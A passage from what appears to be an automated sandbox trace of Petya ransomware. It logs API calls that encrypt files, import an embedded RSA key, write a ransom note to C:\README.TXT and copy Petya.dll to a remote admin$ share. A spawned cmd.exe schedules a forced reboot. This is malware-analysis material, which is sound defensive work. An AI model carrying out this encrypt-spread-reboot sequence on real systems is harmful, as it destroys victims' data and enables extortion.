dwBufLen=0x9520 | out: pbData=0x190000*, pdwDataLen=0x2e4cd50*=0x9520) returned 1 [0041.441] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x9520) returned 1 [0041.443] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.444] CloseHandle (hObject=0x244) returned 1 [0041.444] CloseHandle (hObject=0x240) returned 1 [0041.444] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4cd50*=0x173a4, dwBufLen=0x173b0 | out: pbData=0x2b0000*, pdwDataLen=0x2e4cd50*=0x173b0) returned 1 [0041.446] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x173b0) returned 1 [0041.450] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.451] CloseHandle (hObject=0x244) returned 1 [0041.451] CloseHandle (hObject=0x240) returned 1 [0041.452] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4c4c0*=0xf6a7, dwBufLen=0xf6b0 | out: pbData=0x190000*, pdwDataLen=0x2e4c4c0*=0xf6b0) returned 1 [0041.453] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0xf6b0) returned 1 [0041.455] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.456] CloseHandle (hObject=0x248) returned 1 [0041.456] CloseHandle (hObject=0x244) returned 1 [0041.457] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4bc30*=0x3f65, dwBufLen=0x3f70 | out: pbData=0x190000*, pdwDataLen=0x2e4bc30*=0x3f70) returned 1 [0041.457] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x3f70) returned 1 [0041.459] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.459] CloseHandle (hObject=0x24c) returned 1 [0041.459] CloseHandle (hObject=0x248) returned 1 [0041.460] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4c4c0*=0x7fb3, dwBufLen=0x7fc0 | out: pbData=0x190000*, pdwDataLen=0x2e4c4c0*=0x7fc0) returned 1 [0041.461] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x7fc0) returned 1 [0041.462] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.463] CloseHandle (hObject=0x248) returned 1 [0041.463] CloseHandle (hObject=0x244) returned 1 [0041.464] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0x7215, dwBufLen=0x7220 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0x7220) returned 1 [0041.465] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x7220) returned 1 [0041.467] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.467] CloseHandle (hObject=0x240) returned 1 [0041.467] CloseHandle (hObject=0x204) returned 1 [0041.468] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x190000, pdwDataLen=0x2e4d5e0*=0x9b95, dwBufLen=0x9ba0 | out: pbData=0x190000*, pdwDataLen=0x2e4d5e0*=0x9ba0) returned 1 [0041.469] FlushViewOfFile (lpBaseAddress=0x190000, dwNumberOfBytesToFlush=0x9ba0) returned 1 [0041.471] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.471] CloseHandle (hObject=0x240) returned 1 [0041.471] CloseHandle (hObject=0x204) returned 1 [0041.472] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x12c52, dwBufLen=0x12c60 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x12c60) returned 1 [0041.474] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x12c60) returned 1 [0041.475] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.476] CloseHandle (hObject=0x240) returned 1 [0041.476] CloseHandle (hObject=0x204) returned 1 [0041.476] CryptEncrypt (in: hKey=0x54aba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2b0000, pdwDataLen=0x2e4d5e0*=0x10bd0, dwBufLen=0x10be0 | out: pbData=0x2b0000*, pdwDataLen=0x2e4d5e0*=0x10be0) returned 1 [0041.478] FlushViewOfFile (lpBaseAddress=0x2b0000, dwNumberOfBytesToFlush=0x10be0) returned 1 [0041.480] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0041.480] CloseHandle (hObject=0x240) returned 1 [0041.480] CloseHandle (hObject=0x204) returned 1 [0041.510] CryptStringToBinaryW (in: pszString="MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB", cchString=0x0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x2e4f1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x2e4f1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.510] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x53c050 [0041.510] CryptStringToBinaryW (in: pszString="MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB", cchString=0x0, dwFlags=0x1, pbBinary=0x53c050, pcbBinary=0x2e4f1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x53c050, pcbBinary=0x2e4f1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.510] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x53c050, cbEncoded=0x10e, dwFlags=0x0, pDecodePara=0x0, pvStructInfo=0x0, pcbStructInfo=0x2e4f1e4 | out: pvStructInfo=0x0, pcbStructInfo=0x2e4f1e4) returned 1 [0041.514] LocalAlloc (uFlags=0x40, uBytes=0x114) returned 0x53c168 [0041.514] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x53c050, cbEncoded=0x10e, dwFlags=0x0, pDecodePara=0x0, pvStructInfo=0x53c168, pcbStructInfo=0x2e4f1e4 | out: pvStructInfo=0x53c168, pcbStructInfo=0x2e4f1e4) returned 1 [0041.515] CryptImportKey (in: hProv=0x557e08, pbData=0x53c168, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x551bb4 | out: phKey=0x551bb4*=0x54abe0) returned 1 [0041.515] LocalFree (hMem=0x53c168) returned 0x0 [0041.515] LocalFree (hMem=0x53c050) returned 0x0 [0041.515] CryptExportKey (in: hKey=0x54aba0, hExpKey=0x54abe0, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x2e4f1e8 | out: pbData=0x0, pdwDataLen=0x2e4f1e8*=0x10c) returned 1 [0041.515] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0x53c050 [0041.516] CryptExportKey (in: hKey=0x54aba0, hExpKey=0x54abe0, dwBlobType=0x1, dwFlags=0x0, pbData=0x53c050, pdwDataLen=0x2e4f1e8 | out: pbData=0x53c050*, pdwDataLen=0x2e4f1e8*=0x10c) returned 1 [0041.517] CryptBinaryToStringW (in: pbBinary=0x53c050, cbBinary=0x10c, dwFlags=0x1, pszString=0x0, pcchString=0x2e4f1e4 | out: pszString=0x0, pcchString=0x2e4f1e4) returned 1 [0041.518] LocalAlloc (uFlags=0x40, uBytes=0x2ea) returned 0x54f898 [0041.518] CryptBinaryToStringW (in: pbBinary=0x53c050, cbBinary=0x10c, dwFlags=0x1, pszString=0x54f898, pcchString=0x2e4f1e4 | out: pszString="AQIAAA5mAAAApAAANUldtvtKKU1mS2hocPjGIMog8hcf59P2AV+Y9EaPFWZt4SWP\r\nWCDsnvQ/6gW6jT5maHjhKQdGATWxtbWdYvIFZuAdM7BZzrSKiH1SFAQpa5gj26o1\r\ni6yFqL6ImeSO9cvmjZP+2TDVIOKcMdFzR7Mv+YDmEo0cEUKijsaYJAv2Ka5Wi8vX\r\nTPl0mq+RPnbsRygh3UYnWcpDXEgwwLsC1e5vKSYct9iRF18kOAPOGa2vil5v1sOO\r\niTt9rGyw2EW8BlzgQffr127tWCnT52x11QNLN69bJPmHtKv+SoWJFdNQL2e7Emsd\r\n2kYquDAcmNSFBCLBueXjjGilrteSzk/iflzLSw==\r\n", pcchString=0x2e4f1e4) returned 1 [0041.518] LocalFree (hMem=0x53c050) returned 0x0 [0041.518] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="README.TXT" | out: pszDest="C:\\README.TXT") returned="C:\\README.TXT" [0041.518] GetTickCount () returned 0x115d0 [0041.518] Sleep (dwMilliseconds=0x0) [0041.518] CreateFileW (lpFileName="C:\\README.TXT" (normalized: "c:\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0041.525] WriteFile (in: hFile=0x1e8, lpBuffer=0xf0118*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0xf0118*, lpNumberOfBytesWritten=0x2e4f814*=0x432, lpOverlapped=0x0) returned 1 [0041.526] WriteFile (in: hFile=0x1e8, lpBuffer=0xf00c8*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0xf00c8*, lpNumberOfBytesWritten=0x2e4f814*=0x4c, lpOverlapped=0x0) returned 1 [0041.526] WriteFile (in: hFile=0x1e8, lpBuffer=0xf0038*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0xf0038*, lpNumberOfBytesWritten=0x2e4f814*=0x8e, lpOverlapped=0x0) returned 1 [0041.527] WriteFile (in: hFile=0x1e8, lpBuffer=0xefffc*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0xefffc*, lpNumberOfBytesWritten=0x2e4f814*=0x38, lpOverlapped=0x0) returned 1 [0041.527] WriteFile (in: hFile=0x1e8, lpBuffer=0xeffb0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0xeffb0*, lpNumberOfBytesWritten=0x2e4f814*=0x48, lpOverlapped=0x0) returned 1 [0041.527] WriteFile (in: hFile=0x1e8, lpBuffer=0x54f898*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x2e4f814, lpOverlapped=0x0 | out: lpBuffer=0x54f898*, lpNumberOfBytesWritten=0x2e4f814*=0x2e8, lpOverlapped=0x0) returned 1 [0041.527] CloseHandle (hObject=0x1e8) returned 1 [0041.528] LocalFree (hMem=0x0) returned 0x0 [0041.528] CryptDestroyKey (hKey=0x54aba0) returned 1 [0041.528] CryptReleaseContext (hProv=0x557e08, dwFlags=0x0) returned 1 [0041.528] LocalFree (hMem=0x551ba8) returned 0x0 Thread: id = 21 os_tid = 0x9b8 Thread: id = 22 os_tid = 0x9bc [0039.999] wsprintfW (in: param_1=0x316e190, param_2="\\\\%s\\admin$" | out: param_1="\\\\192.168.0.1\\admin$") returned 20 [0039.999] PathFindFileNameW (pszPath="C:\\Users\\HJRD1K~1\\Desktop\\Petya.dll") returned="Petya.dll" [0039.999] wsprintfW (in: param_1=0x316f3b8, param_2="\\\\%ws\\admin$\\%ws" | out: param_1="\\\\192.168.0.1\\admin$\\Petya.dll") returned 30 [0039.999] WNetAddConnection2W (lpNetResource=0x316e170*(dwScope=0x0, dwType=0x1, dwDisplayType=0x0, dwUsage=0x0, lpLocalName=0x0, lpRemoteName="\\\\192.168.0.1\\admin$", lpComment=0x0, lpProvider=0x0), lpPassword=0x0, lpUserName=0x0, dwFlags=0x0) Thread: id = 33 os_tid = 0xa44 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x77a02000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x948" cmd_line = "/c schtasks /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST 17:15" cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 289 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 290 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 291 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 292 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 293 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 294 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 295 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 296 start_va = 0x49ef0000 end_va = 0x49f3bfff entry_point = 0x49ef829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 297 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 298 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 299 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 300 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 301 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 302 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 303 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 304 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 305 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 306 start_va = 0x390000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 307 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 308 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 309 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 338 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 339 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 340 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 341 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 342 start_va = 0x730000 end_va = 0x73ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 343 start_va = 0x74aa0000 end_va = 0x74aa6fff entry_point = 0x74aa1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 344 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 345 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 346 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 347 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 348 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 349 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 350 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 351 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 352 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 353 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 354 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 355 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 356 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 357 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 358 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 359 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 360 start_va = 0x740000 end_va = 0x8c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 361 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 362 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 363 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 364 start_va = 0xe0000 end_va = 0xfffff entry_point = 0xe0000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 365 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 366 start_va = 0x8d0000 end_va = 0xa50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 367 start_va = 0xa60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 394 start_va = 0x1e60000 end_va = 0x212efff entry_point = 0x1e60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 3 os_tid = 0x964 [0036.651] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af830 | out: lpSystemTimeAsFileTime=0x2af830*(dwLowDateTime=0xd9c60b50, dwHighDateTime=0x1d2f1b1)) [0036.651] GetCurrentProcessId () returned 0x960 [0036.651] GetCurrentThreadId () returned 0x964 [0036.651] GetTickCount () returned 0x107ec [0036.651] QueryPerformanceCounter (in: lpPerformanceCount=0x2af828 | out: lpPerformanceCount=0x2af828*=156420959) returned 1 [0036.672] GetModuleHandleA (lpModuleName=0x0) returned 0x49ef0000 [0036.681] __set_app_type (_Type=0x1) [0036.681] __p__fmode () returned 0x769e31f4 [0037.661] __p__commode () returned 0x769e31fc [0037.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f121a6) returned 0x0 [0037.662] __getmainargs (in: _Argc=0x49f14238, _Argv=0x49f14240, _Env=0x49f1423c, _DoWildCard=0, _StartInfo=0x49f14140 | out: _Argc=0x49f14238, _Argv=0x49f14240, _Env=0x49f1423c) returned 0 [0037.662] GetCurrentThreadId () returned 0x964 [0037.663] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x964) returned 0x64 [0037.663] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74e70000 [0037.663] GetProcAddress (hModule=0x74e70000, lpProcName="SetThreadUILanguage") returned 0x74e9a84f [0037.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.664] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0037.664] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7c0 | out: phkResult=0x2af7c0*=0x0) returned 0x2 [0037.664] VirtualQuery (in: lpAddress=0x2af7f7, lpBuffer=0x2af790, dwLength=0x1c | out: lpBuffer=0x2af790*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0037.664] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af790, dwLength=0x1c | out: lpBuffer=0x2af790*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0037.664] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af790, dwLength=0x1c | out: lpBuffer=0x2af790*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0037.664] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af790, dwLength=0x1c | out: lpBuffer=0x2af790*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0037.665] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af790, dwLength=0x1c | out: lpBuffer=0x2af790*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0037.665] GetConsoleOutputCP () returned 0x1b5 [0037.665] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0037.665] SetConsoleCtrlHandler (HandlerRoutine=0x49f0e72a, Add=1) returned 1 [0037.665] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.665] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0037.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f141ac | out: lpMode=0x49f141ac) returned 1 [0037.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0037.667] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0037.667] _get_osfhandle (_FileHandle=0) returned 0x3 [0037.667] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f141b0 | out: lpMode=0x49f141b0) returned 1 [0037.669] _get_osfhandle (_FileHandle=0) returned 0x3 [0037.669] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0037.670] GetEnvironmentStringsW () returned 0x501fc0 [0037.670] FreeEnvironmentStringsW (penv=0x501fc0) returned 1 [0037.670] GetEnvironmentStringsW () returned 0x501fc0 [0037.670] FreeEnvironmentStringsW (penv=0x501fc0) returned 1 [0037.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae730 | out: phkResult=0x2ae730*=0x6c) returned 0x0 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x0, lpData=0x2ae73c*=0x0, lpcbData=0x2ae734*=0x1000) returned 0x2 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | out: lpType=0x2ae738*=0x4, lpData=0x2ae73c*=0x1, lpcbData=0x2ae734*=0x4) returned 0x0 [0037.671] RegQueryValueExW (in: hKey=0x6c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae738, lpData=0x2ae73c, lpcbData=0x2ae734*=0x1000 | 